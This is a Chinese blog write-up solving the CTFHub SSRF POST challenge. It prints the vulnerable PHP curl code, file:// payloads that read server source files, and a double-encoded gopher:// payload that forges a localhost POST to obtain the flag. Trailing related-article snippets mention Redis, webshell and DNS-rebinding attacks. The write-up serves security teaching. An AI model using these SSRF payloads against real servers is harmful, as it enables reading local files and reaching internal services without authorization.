CTFHub技能树 Web-SSRF POST请求

最新推荐文章于 2025-03-09 23:33:08 发布
最新推荐文章于 2025-03-09 23:33:08 发布
阅读量3.5k 收藏 22
点赞数 11
分类专栏: CTFHub WEB Writeup 文章标签: CTFHub技能树 CTF writeup SSRF Gopher协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/118387034
版权

POST请求

hint:这次是发一个HTTP POST请求,对了,ssrf是用php的curl实现的,并且会跟踪302跳转,加油吧骚年。

启动环境,访问页面为空白,查看URL:

http://challenge-d01ce204edb10174.sandbox.ctfhub.com:10800/?url=_

通过 GET 传参直接拼接上127.0.0.1/flag.php,访问后得到一个输入框:
在这里插入图片描述
查看源码:

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=51457bb0a50c1eb2c92dcc3ec3c2cc13-->
</form>

得到key值,输入后:
在这里插入图片描述
提示只允许从127.0.0.1访问,尝试通过file协议读取index.php以及flag.php页面的源码,构造如下 Payload:

?url=file:///var/www/html/index.php
?url=file:///var/www/html/flag.php

得到index.php页面源码如下:

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

得到flag.php页面源码如下:

<?php

error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=<?php echo $key;?>-->
</form>

尝试使用 Gopher 协议向服务器发送 POST 包
首先构造 Gopher协议所需的 POST请求:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=51457bb0a50c1eb2c92dcc3ec3c2cc13

:在使用 Gopher协议发送 POST请求包时,HostContent-TypeContent-Length请求头是必不可少的,但在 GET请求中可以没有。

在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。

所以我们需要对构造的请求包进行两次 URL编码:
将构造好的请求包进行第一次 URL编码:
在这里插入图片描述

:在第一次编码后的数据中,将%0A全部替换为%0D%0A。因为 Gopher协议包含的请求数据包中,可能包含有=&等特殊字符,避免与服务器解析传入的参数键值对混淆,所以对数据包进行 URL编码,这样服务端会把%后的字节当做普通字节。

再进行第二次 URL编码得到如下 Gopher请求内容:

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D51457bb0a50c1eb2c92dcc3ec3c2cc13

因为flag.php中的$_SERVER["REMOTE_ADDR"]无法绕过,只能通过index.php页面中的curl功能向目标发送 POST请求,构造如下Payload:

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D51457bb0a50c1eb2c92dcc3ec3c2cc13

向目标发送请求,得到 flag:
在这里插入图片描述

CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
m0_59151303的博客
07-24 1409
第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变。第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 4215
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTFHub技能树笔记之SSRFPOST请求、文件上传
weixin_48799157的博客
04-03 9439
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHub技能树点亮之路-SSRF通关攻略(三)
最新发布
m0_66808441的博客
03-09 614
可先通过尝试查看phpinfo()判断木马文件是否上传成功。继续向父级查看,直到在根目录下发现的flag文件。可以发现此处定义了一个表单,提交方式为Post。出现了一个文本框,F12查看页面源代码。输入框的name为下方注释的key值。未发现flag,查看上一级。
CTFHub_Web_SSRF_POST
阿刁〇的博客
08-08 1076
CTFHub_Web_SSRF_POST 首先,简单来了解一下SSRF SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形 成由服务器发起请求的一个漏洞。让服务器去请求通常请求不到的东西。 一般用来在外网探测或攻击内网服务。 SSRF漏洞形成的原因多事服务端提供了从外部服务获取数据的功能,但没有对目标地址、协议等重要参数进行过滤和限制,从而导致攻击者可以自由构造参数,而发起预期外的请求 漏洞成因 相关函数 file_get_conte
CTFHub技能树web(持续更新)--SSRF--POST请求
jiuyongpinyin的博客
02-02 962
POST请求 这道题我没做出来,是参考了大佬的文档做得 点我查看大佬链接 有很多不解的地方,这里我就只提供我的payload把 url=gopher://127.0.0.1/_POST%252b/flag.php%252bHTTP/1.1 Host%25253a%252b127.0.0.1%25253a80 Content-Type%25253a%252bapplication/x-www-form-urlencoded Content-Length%25253a%252b36 Content-Leng
ctfhub:ssrf中的post
qq_30396927的博客
05-01 1406
ctfhub:ssrf中的post题 开始通过尝试访问: view-source:http://challenge-c2ada75a64aad599.sandbox.ctfhub.com:10080/?url=file:///var/www/html/index.php ctrl+u查看网页代码获得 然后访问: view-source:http://challenge-c2ada75a64aad599.sandbox.ctfhub.com:10080/?url=file:///var/www/html/f
CTFHubWEBSSRF(前四关)--内网访问、伪协议读取文件、端口扫描、post请求
weixin_57240513的博客
07-24 561
配置好后开始攻击,根据长度不同查看到端口为8965端口已经查出但是请求错误,怀疑是dirt://不可用然后改成http://后,成功拿到。
CTFHub技能树 Web-SSRF篇(保姆级通过全攻略)
2301_76631050的博客
07-24 1063
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Serve在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。步骤三:将HTTP头部的Host字段修改为127.0.0.1:80然后就是老操作... url编码一次在把%0A换成 %0D%0A 并且末尾要加上%0D%0A,然后再对url进行第二次编码....如下。步骤三:将其中的%0A 替换成%0D%0A 并且末尾要加上%0D%0A。
CTFHub技能树 Web-SSRF
2301_80176211的博客
08-27 249
进入技能书,找到WEB-SSRF
CTFHub-Web-SSRF解题过程
2401_86440467的博客
08-10 1966
开启环境访问后,url=后添加如下,得到flag。
php curl ssrf,CTFHUB技能树-SSRFPOST请求
weixin_36043142的博客
03-16 730
CTFHUB SSRF POST请求废话首先开始解题构造gopher数据构造获取flag的请求废话最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先我们看下题目描述,这个肯定是不能错过的。*描述:发一个HTTP POST请求.ssrf是用php的curl实现的.并且会跟踪302跳转.开始解...
ctfhub-web-ssrf-POST请求
m0_52484587的博客
08-29 1106
在使用 Gopher协议发送 POST请求包时,Host、Content-Type和Content-Length请求头是必不可少的,但在 GET请求中可以没有。在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年。我们尝试通过file协议读取index.php 和flag.php的页面源码。发送POST请求,得到flag。
CTFHUB-SSRF-POST请求
weixin_68416970的博客
06-22 683
CTFHUB靶场技能树-SSRF-POST请求的通关教程
CTFHUB-POST请求
Dug123456_的博客
04-11 1289
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议请求
CTFHUB-SSRF-POST请求(小宇特详解)
小宇的web博客
10-23 3950
CTFHUB-SSRF-POST请求 这里先说一下这里你需要知道的东西 而不是只会做题,不知道其所以然 这里我先说一下这里题里说的302跳转在这里发挥了什么作用 302跳转的302是http状态码 表示请求的网页自请求的网页移动到了新的位置,搜索引擎索引中保存原来的URL 这里可以通过访问302.php,并且传参gopher来伪造本地访问 Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。随着HTTP协议的壮大,Gopher协议已经慢慢的淡出了我们的视线,但是Gop
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 3204
SSRF相关题目实战
ctfhub---SSRF
tansty_zh的博客
09-10 2269
1.内网访问 直接访问127.0.0.1/flag.php 2.伪协议读取文件 可以使用php伪协议中的file协议 构造playload:file:///var/www/html/flag.php flag在源代码中 3.端口扫描 dict协议可以用来探测开放的端口 构造payload dict://127.0.0.1: 利用burpsuite进行爆破 得到开放的端口为8666 进行访问 得到flag ...
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1543
ctfhub ssrf post小记
CTFHub-Web ssrf post请求
01-08
### CTFHub Web平台中的SSRF漏洞利用Post请求 #### SSRF漏洞概述 服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种攻击方式,其中攻击者能够诱使服务器向任意URL发出HTTP请求。这种攻击可能让攻击者绕过防火墙和其他安全控制措施,访问内部网络资源或敏感数据。 当应用程序允许用户输入并将其作为部分构建对外部服务的请求时,如果没有适当验证这些输入,则可能存在SSRF风险[^1]。 #### Post请求下的SSRF漏洞利用实例 在某些情况下,Web应用会接受来自用户的POST参数,并基于此创建新的HTTP POST请求到指定的目标位置。假设有一个接口`/api/fetchData`接收两个字段:一个是目标网址(`url`);另一个是要发送的数据体(`data`)。如果这个API不对传入的`url`做任何校验就直接发起请求的话,那么它就是一个潜在的SSRF入口点[^3]。 例如,在CTF场景下,可以通过构造如下表单提交来测试是否存在此类漏洞: ```html <form action="http://example.com/api/fetchData" method="POST"> <input type="hidden" name="url" value="http://internal-service/admin"/> <textarea name="data">{"action":"listUsers"}</textarea> <button>Submit</button> </form> ``` 一旦成功触发该行为,服务器就会尝试连接至所提供的内部路径并向其传递JSON负载,这可能导致未授权的信息泄露或其他更严重的后果。 #### 防御策略建议 为了防止上述情况的发生,应该采取以下几种方法加强防护: - **严格验证所有外部可控变量**:确保每一个由客户端提供的值都被仔细审查,特别是那些用来组成最终调用链路的部分。 - **采用白名单模式限定可到达的目的地集合**:仅限于已知可信站点列表内的链接才被准许处理,拒绝一切超出范围之外的选择。 - **实施细粒度的身份认证与权限管理**:即使是在受控环境之内也要遵循最小特权原则,即只有真正必要的时候才能给予特定实体执行高危动作的权利。 另外值得注意的是,除了基本防范手段外还可以考虑引入诸如代理层之类的技术方案进一步隔离内外网之间的交互过程,减少暴露面的同时也增加了中间件层面的安全保障能力[^4]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值